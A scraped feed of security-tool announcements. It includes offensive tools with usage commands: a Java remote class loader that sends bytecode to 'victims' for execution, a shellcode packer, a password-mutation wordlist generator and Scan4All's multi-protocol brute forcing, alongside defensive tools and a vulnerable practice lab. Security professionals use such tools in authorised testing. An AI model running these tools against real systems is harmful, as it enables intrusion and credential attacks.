Altdns Subdomain discovery through alterations and permutations
Nosqlmap NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases and web applications using NoSQL in order to disclose or clone data from the database
ParamSpider Parameter miner for humans
GoSpider GoSpider - Fast web spider written in Go
eyewitness EyeWitness is a Python tool written by @CptJesus and @christruncer. Its goal is to help you efficiently assess which assets of your target to look into first.
CRLFuzz A fast tool to scan CRLF vulnerability written in Go
DontGO403 dontgo403 is a tool to bypass 40X errors
Chameleon Chameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technologies
uncover uncover is a go wrapper using APIs of well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and utilize the results with your current pipeline tools
wpscan WordPress Security Scanner

Requirements in Arsenal

  • Python3
  • Git
  • Ruby
  • Wget
  • GO-Lang
  • Rust

Go-lang installation

 sudo apt-get remove -y golang-go
sudo rm -rf /usr/local/go
wget https://go.dev/dl/go1.19.1.linux-amd64.tar.gz
sudo tar -xvf go1.19.1.linux-amd64.tar.gz
sudo mv go /usr/local
# Add the following lines to /etc/profile or ~/.profile
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$GOPATH/bin
source /etc/profile # to update your shell

How to install

git clone https://github.com/Micro0x00/Arsenal.git
cd Arsenal
sudo chmod +x Arsenal.sh
sudo ./Arsenal.sh




Wireshark Analyzer 4.0.0

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

Erlik 2 - Vulnerable-Flask-App


Erlik 2 - Vulnerable-Flask-App

Tested - Kali 2022.1

Description

It is a vulnerable Flask Web App. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • HTML Injection
  • XSS
  • SSTI
  • SQL Injection
  • Information Disclosure
  • Command Injection
  • Brute Force
  • Deserialization
  • Broken Authentication
  • DOS
  • File Upload

Installation

git clone https://github.com/anil-yelken/Vulnerable-Flask-App

cd Vulnerable-Flask-App

sudo pip3 install -r requirements.txt

Usage

python3 vulnerable-flask-app.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Utkuici - Nessus Automation


Today, with the spread of information technology systems, investments in the field of cyber security have increased to a great extent. Vulnerability management, penetration tests and various analyses are carried out to accurately determine how much our institutions can be affected by cyber threats. With Tenable Nessus, the industry leader in vulnerability management tools, a newly joined IP address on the corporate network, a newly opened port, or an exploitable vulnerability can be determined, and a Python application that integrates with Tenable Nessus has been developed to identify these events automatically.


Features

  • Finding New IP Address
  • Finding New Port
  • Finding New Exploitable Vulnerability

Installation

git clone https://github.com/anil-yelken/Nessus-Automation
cd Nessus-Automation
sudo pip3 install -r requirements.txt

Usage

The SIEM IP address in the codes should be changed.

In order to detect a new IP address exactly, the tool checks whether the phrase "Host Discovery" was used in the Nessus scan name, records the live IP addresses in the database with a timestamp, and sends any new (difference) IP addresses to the SIEM. The contents of the hosts table were as follows:

Usage: python finding-new-ip-nessus.py
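
The new-IP detection described above boils down to a set difference plus a notification. The following Python sketch is illustrative only and is not the project's code; the SQLite table, the syslog-style UDP transport and the message format are assumptions made for the example.

import socket
import sqlite3
from datetime import datetime

SIEM_ADDR = ("192.168.1.10", 514)   # assumed SIEM address, change as needed

def report_new_ips(live_ips):
    # Compare the current live IPs against the hosts table and forward the difference.
    con = sqlite3.connect("nessus.db")
    con.execute("CREATE TABLE IF NOT EXISTS hosts (ip TEXT PRIMARY KEY, first_seen TEXT)")
    known = {row[0] for row in con.execute("SELECT ip FROM hosts")}
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    for ip in set(live_ips) - known:
        stamp = datetime.now().isoformat(timespec="seconds")
        con.execute("INSERT INTO hosts VALUES (?, ?)", (ip, stamp))
        sock.sendto(f"New IP: {ip}|{stamp}".encode(), SIEM_ADDR)
    con.commit()
    con.close()

# live_ips would come from the "Host Discovery" scan results pulled via the Nessus API.
report_new_ips(["10.0.0.12", "10.0.0.54"])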

By checking the port scans made by Nessus, the port-IP-timestamp information is recorded in the database; a newly opened service is detected by comparing against the database, and the data is transmitted to the SIEM in the form "New Port:" port-IP-timestamp. The result observed by the SIEM is as follows:

Usage: python finding-new-port-nessus.py

In the findings of vulnerability scans made in institutions and organizations, exploitable vulnerabilities should be closed first. The tool records the vulnerabilities that can be exploited with Metasploit in the database and transmits this information to the SIEM whenever it finds a new exploitable vulnerability on the systems. Exploitable vulnerabilities observed by the SIEM:

Usage: python finding-exploitable-service-nessus.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Java-Remote-Class-Loader - Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API


This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using the Java ClassLoader together with the Reflect API. The client receives the class file from the server and returns the respective execution output. Payloads must be written in Java and compiled before starting the server.


Features

  • Client-server architecture
  • Remote loading of Java class files
  • In-transit encryption using ChaCha20 cipher
  • Settings defined via args
  • Keepalive mechanism to re-establish communication if server restarts

Installation

Tool has been tested using OpenJDK 11 with JRE Java Package, both on Windows and Linux (zip portable version). Java version should be 11 or higher due to dependencies.

https://www.openlogic.com/openjdk-downloads

Usage

$ java -jar java-class-loader.jar -help

usage: Main
-address <arg> address to connect (client) / to bind (server)
-classfile <arg> filename of bytecode .class file to load remotely
(default: Payload.class)
-classmethod <arg> name of method to invoke (default: exec)
-classname <arg> name of class (default: Payload)
-client run as client
-help print this message
-keepalive keeps the client getting classfile from server every
X seconds (default: 3 seconds)
-key <arg> secret key - 256 bits in base64 format (if not
specified it will generate a new one)
-port <arg> port to connect (client) / to bind (server)
-server run as server

Example

Assuming you have the following Hello World payload in the Payload.java file:

//Payload.java
public class Payload {
public static String exec() {
String output = "";
try {
output = "Hello world from client!";
} catch (Exception e) {
e.printStackTrace();
}
return output;
}
}

Then you should compile and produce the respective Payload.class file.

To run the server process listening on port 1337 on all net interfaces:

$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class

Running as server
Server running on 0.0.0.0:1337
Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

On the client side, you may use the same JAR package with the -client flag and the symmetric key generated by the server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are Payload and String exec() respectively). Additionally, you can specify -keepalive to keep the client requesting the class file from the server while maintaining the connection.

$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=

Running as client
Connecting to 192.168.1.73:1337
Received 593 bytes from server
Output from invoked class method: Hello world from client!
Sent 24 bytes to server

References

Refer to https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a blog post related with the development of this tool.

  1. https://github.com/rebeyond/Behinder

  2. https://github.com/AntSwordProject/antSword

  3. https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/

  4. https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis

  5. https://xz.aliyun.com/t/2799

  6. https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7

  7. https://venishjoe.net/post/dynamically-load-compiled-java-class/

  8. https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php

  9. https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/

  10. https://openjdk.org/jeps/329

  11. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html

  12. https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html



OpenSSH 9.1p1

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

Bayanay - Python Wardriving Tool


WarDriving is the act of navigating, on foot or by car, to discover wireless networks in the surrounding area.

Features

Wardriving is done by combining the SSID information obtained with scapy with the location data obtained through the HTML5 geolocation feature.
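
As a rough sketch of the scapy side of this (not necessarily how ssidBul.py is implemented; the monitor-mode interface name and the output format are assumptions modelled on the sample output shown below):

from datetime import datetime
from scapy.all import sniff, Dot11, Dot11Beacon, Dot11Elt

def on_packet(pkt):
    # Beacon frames advertise an access point's SSID and BSSID (MAC address).
    if pkt.haslayer(Dot11Beacon):
        ssid = pkt[Dot11Elt].info.decode(errors="ignore")
        mac = pkt[Dot11].addr2
        stamp = datetime.now().strftime("%d %B %Y %I:%M%p")
        print(f"{stamp}|{mac}|{ssid}")

# Requires a wireless interface in monitor mode; "wlan0mon" is an assumption.
sniff(iface="wlan0mon", prn=on_packet, store=0)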


Usage

I cannot be held responsible for malicious use of this tool.

ssidBul.py has been tested via TP-LINK TL WN722N.

Selenium 3.11.0 and Firefox 59.0.2 are used for location.py. Firefox geckodriver is located in the directory where the codes are.

SSID and MAC names and location information were created and changed in the test environment.

ssidBul.py and location.py must be run concurrently.

ssidBul.py result:

20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Here is a screenshot of allowing location information while running location.py:

The screenshot of the location information is as follows:

konum.py result:

lat=38.8333635|lon=34.759741899|20 March 2018 11:47PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

lat=38.8333635|lon=34.759741899|20 March 2018 11:49PM

After the data collection processes, the following output is obtained as a result of running wardriving.py:

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|9c:b2:b2:11:12:13|ECFJ3M

lat=38.8333635|lon=34.759741899|20 March 2018 11:48PM|c0:25:e9:11:12:13|T7068

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Deadfinder - Find Dead-Links (Broken Links)


A dead link (broken link) is a link within a web page that can no longer be reached. These links can have a negative impact on SEO and security. This tool makes it easy to identify and fix them.
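
As a rough illustration of the idea (deadfinder itself is a Ruby gem and works differently in detail; the target URL is just an example), the sketch below fetches a page, collects its href links, and flags the ones that no longer answer:

import urllib.request
import urllib.error
from html.parser import HTMLParser
from urllib.parse import urljoin

class LinkExtractor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

def find_dead_links(page_url):
    html = urllib.request.urlopen(page_url, timeout=10).read().decode(errors="ignore")
    parser = LinkExtractor()
    parser.feed(html)
    dead = []
    for href in parser.links:
        target = urljoin(page_url, href)
        try:
            # urlopen raises for HTTP errors and unreachable hosts.
            if urllib.request.urlopen(target, timeout=10).status >= 400:
                dead.append(target)
        except (urllib.error.URLError, ValueError):
            dead.append(target)
    return dead

for link in find_dead_links("https://www.hahwul.com"):
    print("dead:", link)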


Installation

Install with Gem

gem install deadfinder

Docker Image

docker pull ghcr.io/hahwul/deadfinder:latest

Usage

Commands:
deadfinder file # Scan the URLs from File. (e.g deadfinder file urls.txt)
deadfinder help [COMMAND] # Describe available commands or one specific command
deadfinder pipe # Scan the URLs from STDIN. (e.g cat urls.txt | deadfinder pipe)
deadfinder sitemap # Scan the URLs from sitemap.
deadfinder url # Scan the Single URL.
deadfinder version # Show version.

Options:
c, [--concurrency=N] # Set Concurrncy
# Default: 20
t, [--timeout=N] # Set HTTP Timeout
# Default: 10
o, [--output=OUTPUT] # Save JSON Result

Modes

# Scan the URLs from STDIN (multiple URLs)
cat urls.txt | deadfinder pipe

# Scan the URLs from File. (multiple URLs)
deadfinder file urls.txt

# Scan the Single URL.
deadfinder url https://www.hahwul.com

# Scan the URLs from sitemap. (multiple URLs)
deadfinder sitemap https://www.hahwul.com/sitemap.xml

JSON Handling

deadfinder sitemap https://www.hahwul.com/sitemap.xml \
-o output.json

cat output.json | jq


Pmanager - Store And Retrieve Your Passwords From A Secure Offline Database. Check If Your Passwords Have Leaked Previously To Prevent Targeted Password Reuse Attacks


Demo

Description

Store and retrieve your passwords from a secure offline database. Check if your passwords have leaked previously to prevent targeted password reuse attacks.


Why develop another password manager ?

  • This project was initially born from my desire to learn Rust.
  • I was tired of using the clunky GUI of keepassxc.
  • I wanted to learn more about cryptography.
  • For fun. :)

Features

  • Secure password storage with state of the art cryptographic algorithms.
    • Multiple iterations of argon2id for key derivation to make it harder for an attacker to conduct brute force attacks.
    • Aes-gcm256 for database encryption.
  • Custom encrypted key-value database which ensures data integrity. (Read the blog post I wrote about it here.)
  • Easy to install and to use. Does not require connection to an external service for its core functionality.
  • Check if your passwords have been leaked before, to avoid targeted password reuse attacks.
    • This works by hashing your password with keccak-512 and sending the first 10 hexadecimal characters to XposedOrNot (see the sketch after this list).
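
The leak check above can be pictured in a few lines. The snippet below is only an illustration of the idea, not pmanager's actual Rust implementation; it uses pycryptodome for keccak-512 and deliberately stops before contacting XposedOrNot, since only the short prefix would ever be sent.

# Illustrative sketch of the k-anonymity style leak check (pip install pycryptodome).
from Crypto.Hash import keccak

def leaked_check_prefix(password):
    # Hash the password with keccak-512 and return the 10-hex-char prefix
    # that would be sent to the XposedOrNot service (endpoint omitted here).
    digest = keccak.new(digest_bits=512)
    digest.update(password.encode("utf-8"))
    return digest.hexdigest()[:10]

# Only the short prefix ever leaves the machine, never the full hash or password.
print(leaked_check_prefix("correct horse battery staple"))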

Installation

Pmanager depends on "pkg-config" and "libssl-dev" packages on ubuntu. Simply install them with

sudo apt install pkg-config libssl-dev -y

Download the binary file according to your current OS from releases, and add the binary location to PATH environment variable and you are good to go.

Building from source

Ubuntu & WSL

sudo apt update -y && sudo apt install curl
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install build-essential -y
sudo apt install pkg-config libssl-dev git -y
git clone https://github.com/yukselberkay/pmanager
cd pmanager
make install

Windows

git clone https://github.com/yukselberkay/pmanager
cd pmanager
cargo build --release

Mac

I have not been able to test pmanager on a Mac system, but you should be able to build it from source ("cargo build --release"), since there is no OS-specific functionality.

Documentation

Firstly the database needs to be initialized using "init" command.

Init

# Initializes the database in the home directory.
pmanager init --db-path ~

Insert

# Insert a new user and password pair to the database.
pmanager insert --domain github.com

Get

# Get a specific record by domain.
pmanager get --domain github.com

List

# List every record in the database.
pmanager list

Update

# Update a record by domain.
pmanager update --domain github.com

Delete

# Deletes a record associated with domain from the database.
pmanager delete github.com

Leaked

# Check if a password in your database is leaked before.
pmanager leaked --domain github.com
pmanager 1.0.0

USAGE:
pmanager [OPTIONS] [SUBCOMMAND]

OPTIONS:
-d, --debug
-h, --help Print help information
-V, --version Print version information

SUBCOMMANDS:
delete Delete a key value pair from database
get Get value by domain from database
help Print this message or the help of the given subcommand(s)
init Initialize pmanager
insert Insert a user password pair associated with a domain to database
leaked Check if a password associated with your domain is leaked. This option uses
xposedornot api. This check achieved by hashing specified domain's password and
sending the first 10 hexadecimal characters to xposedornot service
list Lists every record in the database
update Update a record from database

Roadmap

  • Unit tests
  • Automatic copying to clipboard and cleaning it.
  • Secure channel to share passwords in a network.
  • Browser extension which integrates with offline database.

Support

Bitcoin Address -> bc1qrmcmgasuz78d0g09rllh9upurnjwzpn07vmmyj



TestSSL 3.0.8

testssl.sh is a free command line tool which checks a server's service on any port for the support of TLS/SSL ciphers, protocols as well as recent cryptographic flaws, and much more. It is written in (pure) bash, makes only use of standard Unix utilities, openssl and last but not least bash sockets.

SIPPTS 3.2

Sippts is a set of tools to audit VoIP servers and devices using SIP protocol. It is programmed in Python script and it allows us to check the security of a VoIP server using SIP protocol, over UDP, TCP and TLS protocols.

monomorph MD5-Monomorphic Shellcode Packer

This tool packs up to 4KB of compressed shellcode into an executable binary, near-instantly. The output file will always have the same MD5 hash: 3cebbe60d91ce760409bbe513593e401. Currently, only Linux x86-64 is supported. It would be trivial to port this technique to other platforms, although each version would end up with a different MD5.

SpyCast - A Crossplatform mDNS Enumeration Tool


SpyCast is a crossplatform mDNS enumeration tool that can work either in active mode by recursively querying services, or in passive mode by only listening to multicast packets.
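
As an illustration of the active-mode idea (SpyCast itself is written in Rust; the sketch below uses the python-zeroconf library purely to show the concept of querying the available service types and then browsing each one):

import time
from zeroconf import Zeroconf, ServiceBrowser, ZeroconfServiceTypes

class Listener:
    def add_service(self, zc, type_, name):
        # Resolve each advertised service to its addresses as it appears.
        info = zc.get_service_info(type_, name)
        print(f"[+] {name} -> {info.parsed_addresses() if info else 'unknown'}")

    def update_service(self, zc, type_, name):
        pass

    def remove_service(self, zc, type_, name):
        pass

zc = Zeroconf()
# "Active" mode: first ask which mDNS service types exist, then browse each one.
for service_type in ZeroconfServiceTypes.find(timeout=5):
    ServiceBrowser(zc, service_type, Listener())
time.sleep(10)
zc.close()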


Building

cargo build --release

OS specific bundle packages (for example dmg and app bundles on OSX) can be built via:

cargo tauri build

SpyCast can also be built without the default UI, in which case all output will be printed on the terminal:

cargo build --no-default-features --release

Running

Run SpyCast in active mode (it will recursively query all available mDNS services):

./target/release/spycast

Run in passive mode (it won't produce any mDNS traffic and only listen for multicast packets):

./target/release/spycast --passive

Other options

Run spycast --help for the complete list of options.

License

This project is made with โ™ฅ by @evilsocket and it is released under the GPL3 license.


Psudohash - Password List Generator That Focuses On Keywords Mutated By Commonly Used Password Creation Patterns


psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a word's letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.


Pentesting Corporate Environments

System administrators and other employees often use a mutated version of the Company's name to set passwords (e.g. Am@z0n_2022). This is commonly the case for network devices (Wi-Fi access points, switches, routers, etc), application or even domain accounts. With the most basic options, psudohash can generate a wordlist with all possible mutations of one or multiple keywords, based on common character substitution patterns (customizable), case variations, strings commonly used as padding and more. Take a look at the following example:


The script includes a basic character substitution schema. You can add/modify character substitution patterns by editing the source and following the data structure logic presented below (default):

transformations = [
{'a' : '@'},
{'b' : '8'},
{'e' : '3'},
{'g' : ['9', '6']},
{'i' : ['1', '!']},
{'o' : '0'},
{'s' : ['$', '5']},
{'t' : '7'}
]
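
As an illustration of how such a substitution schema can be expanded into candidate passwords (this is a simplified sketch, not psudohash's actual mutation engine, which also handles case variations, padding and years):

from itertools import product

# Same schema as above, flattened into a dict of possible substitutes per character.
transformations = {
    'a': ['@'], 'b': ['8'], 'e': ['3'], 'g': ['9', '6'],
    'i': ['1', '!'], 'o': ['0'], 's': ['$', '5'], 't': ['7'],
}

def mutate(word):
    # For each character, allow the original plus any configured substitutes,
    # then emit every combination.
    options = [[ch] + transformations.get(ch.lower(), []) for ch in word]
    for combo in product(*options):
        yield ''.join(combo)

for candidate in mutate("amazon"):
    print(candidate)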

Individuals

When it comes to people, I think we all have (more or less) set passwords using a mutation of one or more words that mean something to us, e.g., our name or wife/kid/pet/band names, sticking the year we were born at the end or maybe a super secure padding like "!@#". Well, guess what?

Installation

No special requirements. Just clone the repo and make the script executable:

git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py

Usage

./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]

The help dialog [ -h, --help ] includes usage details and examples.

Usage Tips

  1. Combining options --years and --append-numbering with a --numbering-limit ≥ the last two digits of any year input will most likely produce duplicate words, because of the mutation patterns implemented by the tool.
  2. If you add custom padding values and/or modify the predefined common padding values in the source code, in combination with multiple optional parameters, there is a small chance of duplicate words occurring. psudohash includes word filtering controls but for speed's sake, those are limited.

Future

I'm gathering information regarding commonly used password creation patterns to enhance the tool's capabilities.



Suricata IDPE 6.0.8

Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools.

nfstream 6.5.2

nfstream is a Python package providing fast, flexible, and expressive data structures designed to make working with online or offline network data both easy and intuitive. It aims to be the fundamental high-level building block for doing practical, real world network data analysis in Python. Additionally, it has the broader goal of becoming a common network data processing framework for researchers providing data reproducibility across experiments.

Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...


  • What is scan4all: it integrates vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent. Red team tools: code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects. In principle, the wheel is not reinvented unless there are bugs or problems.
  • Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.
  • Support [21] password blasting, support custom dictionary, open by "priorityNmap": true
    • RDP
    • SSH
    • rsh-spx
    • Mysql
    • MsSql
    • Oracle
    • Postgresql
    • Redis
    • FTP
    • Mongodb
    • SMB, also detect MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148), SmbGhost (CVE-2020-0796)
    • Telnet
    • Snmp
    • Wap-wsp (Elasticsearch)
    • RouterOs
    • HTTP BasicAuth
    • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
    • Tomcat
    • Jboss
    • Winrm(wsman)
    • POP3
  • By default, http password intelligent blasting is enabled, and it will be automatically activated when an HTTP password is required, without manual intervention
  • Detect whether nmap is present on the system and enable it for fast scanning through priorityNmap=true, which is enabled by default; the optimized nmap parameters are faster than masscan. Disadvantage of using nmap: if the network is bad, the traffic/packet volume can be too large, which may lead to incomplete results. Using nmap additionally requires setting the root password in an environment variable:

  export PPSSWWDD=yourRootPswd 

More references: config/doNmapScan.sh. By default, naabu is used to complete port scanning; use -stats=true to view the scanning progress. Can I skip port scanning?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
  • Fast 15000+ POC detection capabilities, PoCs include:
    • nuclei POC

    Nuclei Templates Top 10 statistics

TAG COUNT AUTHOR COUNT DIRECTORY COUNT SEVERITY COUNT TYPE COUNT
cve 1294 daffainfo 605 cves 1277 info 1352 http 3554
panel 591 dhiyaneshdk 503 exposed-panels 600 high 938 file 76
lfi 486 pikpikcu 321 vulnerabilities 493 medium 766 network 50
xss 439 pdteam 269 technologies 266 critical 436 dns 17
wordpress 401 geeknik 187 exposures 254 low 211
exposure 355 dwisiswant0 169 misconfiguration 207 unknown 7
cve2021 322 0x_akoko 154 token-spray 206
rce 313 princechaddha 147 workflows 187
wp-plugin 297 pussycat0x 128 default-logins 101
tech 282 gy741 126 file 76

281 directories, 3922 files.

  • vscan POC
    • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
  • scan4all POC
  • Support 7000+ web fingerprint scanning, identification:

    • httpx fingerprint
      • vscan fingerprint
      • vscan fingerprint: including eHoleFinger, localFinger, etc.
    • scan4all fingerprint
  • Support 146 protocols and 90000+ rule port scanning

    • Depends on protocols and fingerprints supported by nmap
  • Fast HTTP sensitive file detection, can customize dictionary

  • Landing page detection

  • Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

  • Supports multiple output types - JSON/TXT/CSV/STDOUT

  • Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

  • Smart SSL Analysis:

    • In-depth analysis, automatically correlate the scanning of domain names in SSL information, such as *.xxx.com, and complete subdomain traversal according to the configuration, and the result will automatically add the target to the scanning list
    • Support to enable *.xx.com subdomain traversal function in smart SSL information, export EnableSubfinder=true, or adjust in the configuration file
  • Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

  • Smart processing:

      1. When the IPs of multiple domain names in the list are the same, merge port scans to improve efficiency
      2. Intelligently handle http abnormal pages, and fingerprint calculation and learning
  • Automated supply chain identification, analysis and scanning

  • Link python3 log4j-scan

    • This version blocks the bug that your target information is passed to the DNS Log Server to avoid exposing vulnerabilities
    • Added the ability to send results to Elasticsearch for batch, touch typing
    • There will be time in the future to implement the golang version. How to use it:
mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan
  • Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable

  • Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

  • support HTTP Request Smuggling: CL-TE, TE-CL, TE-TE, CL_CL, BaseErr


  • Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling

work process


how to install

download from Releases

go install github.com/hktalent/scan4all@2.6.9
scan4all -h

how to use

    1. Start Elasticsearch; of course, you can also use the traditional way to output results
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD/config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh

# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 192.168.0.111 is the target to query
  • Please install nmap by yourself before use. Usage help:
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

  • Integrate web-cache-vulnerability-scanner to realize HTTP smuggling smuggling and cache poisoning detection
  • Linkage with metasploit-framework, on the premise that the system has been installed, cooperate with tmux, and complete the linkage with the macos environment as the best practice
  • Integrate more fuzzers , such as linking sqlmap
  • Integrate chromedp to achieve screenshots of landing pages, detection of front-end landing pages with pure js and js architecture, and corresponding crawlers (sensitive information detection, page crawling)
  • Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
  • Integrate ksubdomain to achieve faster subdomain blasting
  • Integrate spider to find more bugs
  • Semi-automatic fingerprint learning to improve accuracy; specify fingerprint name, configure

Q & A

  • how use Cookie?
  • libpcap related question

more see: discussions

Changelog

  • 2022-07-20 fix and PR nuclei #2301: bug with concurrent multi-instance runs
  • 2022-07-20 add web cache vulnerability scanner
  • 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
  • 2022-07-19 add dcom protocol enumeration of network interfaces
  • 2022-06-30 embedded integration of a private build of nuclei-templates, 3744 YAML POCs in total; 1. integrated Elasticsearch to store intermediate results 2. embedded the entire config directory into the program
  • 2022-06-27 optimized fuzzy matching to improve accuracy and robustness; integrated ksubdomain progress
  • 2022-06-24 optimized the fingerprint algorithm; added a workflow diagram
  • 2022-06-23 added the ParseSSl parameter; by default, DNS information in SSL certificates is not deeply analyzed and DNS names found in SSL are not scanned; fixed a bug where nmap was not automatically given the .exe suffix; fixed a bug where cache files on Windows were not size-optimized
  • 2022-06-22 integrated weak-password detection and password brute forcing for 11 protocols: ftp, mongodb, mssql, mysql, oracle, postgresql, rdp, redis, smb, ssh, telnet; also improved support for external password dictionaries
  • 2022-06-20 integrated Subfinder for subdomain enumeration, enabled at startup with export EnableSubfinder=true (note: very slow after startup); automatic deep drilling of domain information in SSL certificates; custom dictionaries and related switches can be defined via config/config.json
  • 2022-06-17 improved handling of one domain with multiple IPs: all IPs are port-scanned and then follow the subsequent scanning workflow
  • 2022-06-15 this version adds several weblogic password dictionaries and webshell dictionaries obtained from past engagements
  • 2022-06-10 completed the integration of nuclei, including the integration of nuclei templates
  • 2022-06-07 added a similarity algorithm to detect 404 pages
  • 2022-06-07 added precise scanning of HTTP URL lists, enabled via the environment variable UrlPrecise=true


Suricata IDPE 6.0.7

Suricata is a network intrusion detection and prevention engine developed by the Open Information Security Foundation and its supporting vendors. The engine is multi-threaded and has native IPv6 support. It's capable of loading existing Snort rules and signatures and supports the Barnyard and Barnyard2 tools.

pyFlipper - Unofficial Flipper Zero CLI Wrapper Written In Python


Unofficial Flipper Zero CLI wrapper written in Python

Functions and characteristics:

  • Flipper serial CLI wrapper
  • Websocket client interface

Setup instructions:

$ git clone https://github.com/wh00hw/pyFlipper.git
$ cd pyFlipper
$ python3 -m venv venv
$ source venv/bin/activate
$ pip install -r requirements.txt

Tested on:

  • Python 3.8.10 on Linux 5.4.0 x86_64
  • Python 3.10.5 on Android 12 (Termux + OTGSerial2WebSocket NO ROOT REQUIRED)

Usage/Examples

Connection

from pyflipper import PyFlipper

#Local serial port
flipper = PyFlipper(com="/dev/ttyACM0")

#OR

#Remote serial2websocket server
flipper = PyFlipper(ws="ws://192.168.1.5:1337")

Power

#Info
info = flipper.power.info()

#Poweroff
flipper.power.off()

#Reboot
flipper.power.reboot()

#Reboot in DFU mode
flipper.power.reboot2dfu()

Update/Backup

#Install update from .fuf file
flipper.update.install(fuf_file="/ext/update.fuf")

#Backup Flipper to .tar file
flipper.update.backup(dest_tar_file="/ext/backup.tar")

#Restore Flipper from backup .tar file
flipper.update.restore(bak_tar_file="/ext/backup.tar")

Loader

#List installed apps
apps = flipper.loader.list()

#Open app
flipper.loader.open(app_name="Clock")

Flipper Info

#Get flipper date
date = flipper.date.date()

#Get flipper timestamp
timestamp = flipper.date.timestamp()

#Get the processes dict list
ps = flipper.ps.list()

#Get device info dict
